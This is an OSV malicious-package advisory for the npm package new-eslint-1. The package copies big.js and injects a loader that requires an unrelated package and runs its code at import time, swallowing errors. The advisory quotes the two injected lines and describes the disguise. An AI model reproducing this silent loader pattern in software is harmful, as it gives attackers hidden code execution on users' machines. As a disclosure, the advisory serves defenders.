MAL-2026-6225

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/new-eslint-1/MAL-2026-6225.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6225

Published

2026-06-19T14:24:00Z

Modified

2026-06-19T15:47:26.706218968Z

Summary

Malicious code in new-eslint-1 (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (7752e7f074edbf8521da2ee0b7c68c28a2f76d86576138df8f18e08aaa3a5c38)

Package is published as 'new-eslint-1' but its package.json description, README, repository URL (MikeMcl/big.js), and source are a verbatim copy of big.js v7.0.1 — there is no ESLint functionality. Two lines have been injected at module top level in both big.js and big.mjs (lines 605-606): const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });. Because package.json declares "main": "big.js", any require('new-eslint-1') synchronously loads the external ts-eslint-helper package and invokes helper.from_str() in the consumer's Node process, with errors silently swallowed. The required module name (ts-eslint-helper) does not match the only declared dependency (eslint-helper-1@5.0.4), so the loader is designed to fire when ts-eslint-helper resolves transitively or via a sibling install in a monorepo / polluted registry — and to fail silently otherwise, hiding the attempt from observers. This combines namespace deception (eslint-themed name + big.js disguise) with import-time arbitrary code execution under the control of whoever publishes ts-eslint-helper.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "7752e7f074edbf8521da2ee0b7c68c28a2f76d86576138df8f18e08aaa3a5c38",
            "source": "amazon-inspector",
            "modified_time": "2026-06-19T14:24:00Z",
            "versions": [
                "7.0.6"
            ],
            "id": "IN-MAL-2026-007068",
            "import_time": "2026-06-19T15:41:55.05250236Z"
        }
    ]
}

References

https://www.npmjs.com/package/new-eslint-1/v/7.0.6

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / new-eslint-1

Package

Name: new-eslint-1; View open source insights on deps.dev
Purl: pkg:npm/new-eslint-1

Affected ranges

Affected versions

7.*

7.0.6

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/new-eslint-1/MAL-2026-6225.json"

indicators

{
    "evidence_files": [
        {
            "sha256": "d1f1baf7ef7571122bd26e3676d6f2dcf7cc7fd7dc9cdec4c3b75535ad0e3bbf",
            "tlsh": "9cc2658c3ac67579593363788f465088eb38525712c8b286b4ae62b46f78cb107b4fdc",
            "path": "big.js"
        },
        {
            "sha256": "8f1195fe80df031c849fa47c6eb1bf5fa4b0662a71bba29caf2959f6673b29c2",
            "tlsh": "97212267c9a19db70af85b98b86c03a9f1151b1f44a14c5bb07b131c4f3345b2096bbd",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-hX05geHm/DgXSmZnlfVu1bjI3qQhKdGu1lJ4U8Ouoyvk1Ro5wjCc7PfMCTtQr8HdiDn1hoOPXf1yNkqelIpz1w==",
                "sha1": "334bea68eb78735839a40c2806d1853f0184ff3c"
            },
            "filename": "new-eslint-1-7.0.6.tgz"
        }
    ]
}